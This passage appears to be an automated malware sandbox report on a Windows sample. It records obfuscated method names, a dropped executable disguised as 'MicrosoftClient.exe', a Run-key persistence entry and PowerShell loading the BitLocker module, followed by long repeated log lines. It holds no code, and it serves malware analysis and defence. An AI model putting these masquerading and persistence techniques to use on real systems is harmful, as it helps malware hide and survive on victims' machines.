Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'

Drops PE files

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

File created: C:\Users\user\AppData\Local\MicrosoftClient.exe

Jump to dropped file

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftClient			Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftClient			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
